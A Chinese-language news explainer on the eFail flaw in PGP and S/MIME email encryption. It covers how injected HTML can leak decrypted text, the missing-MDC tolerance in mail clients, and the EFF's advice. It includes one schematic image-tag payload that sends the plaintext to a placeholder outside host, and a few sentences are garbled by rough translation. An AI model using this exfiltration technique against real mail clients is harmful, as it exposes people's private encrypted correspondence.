据德国和比利时研究人员周一公布的研究结果表明,普遍使用的电子邮件加密方案 PGP 和 S / MIME 容易受到攻击。这种弱点可能暴露加密邮件的明文,这对于那些依靠加密电子邮件来保护他们的隐私安全的用户来说简直是一场噩梦。
这个被称为 eFail 的弱点出现在一个攻击者已经成功拦截了你的加密电子邮件时,它操纵了消息如何处理它的 HTML 元素,比如图像和多媒体样式。当接收者收到更改后的消息和他们的电子邮件客户端如 Outlook 或 Apple Mail,解密时电子邮件程序还将通过恶意修改的通道加载外部多媒体组件,从而允许攻击者获取消息的明文。
eFail 攻击要求黑客首先拥有高水平的访问权限,而这本身就很难实现。他们需要已经能够截获加密的消息,然后才开始传送消息来更改它们。
PGP 是一种经典的端到端加密方案,自上世纪 90 年代末以来,它一直是安全消费电子邮件的首选,原因是免费的开源标准 OpenPGP。但做额外工作的重点防止数据加密的时间离开发件人为接收机的时间显示是减少访问攻击的风险,即使有人可以利用你的加密消息,数据仍将不可读。eFail 是这些二级保护失效的一个例子。
研究人员已经知道自21世纪初以来 eFail 攻击的理论基础,并且 OpenPGP 标准的一些实现已经可以抵御这种攻击。由于攻击主要围绕操纵自定义 HTML,系统可以也应该能够标记目标实际接收的电子邮件已被更改。PGP 的消息认证检查称为“修改检测代码”,MDC 指示消息认证的完整性。但 eFail 强调,许多电子邮件客户端将容忍带有无效或丢失的 MDC 的消息,而不是放弃它们以缓解不同 PGP 实施之间的摩擦。
漏洞原理是这样的:在加密块前后插入外置资源引用字段。比如邮件内容是ABC加密后变为XXX。邮件内容会有很多块组成,多数邮件客户端支持部分块加密、部分块不加密的功能。
攻击者可以在加密块前后插入明文块,使得消息变为:
<img src="https://someweb.site/XXX" />
当邮件客户端收到邮件时,需要对加密块解密,并与非加密的内容拼接。得到以下结果:<img src="https://someweb.site/ABC" />
在邮件客户端渲染这封邮件的时候,会自动请求 someweb.site,并上传邮件内容 ABC。导致邮件泄密。
漏洞也能用于暴露用户过去发送的加密邮件。
EFF 也表示他们确认这些漏洞对使用者构成了紧迫的危险,它建议立即停用或卸载自动加密电子邮件的工具。他们的建议只涉及在电子邮件中整合 PGP 加密的插件,而不是独立应用如 Gpg4win 和 GNU Privacy Guard。
这漏洞也太简单了。。。此前居然一直没人发现??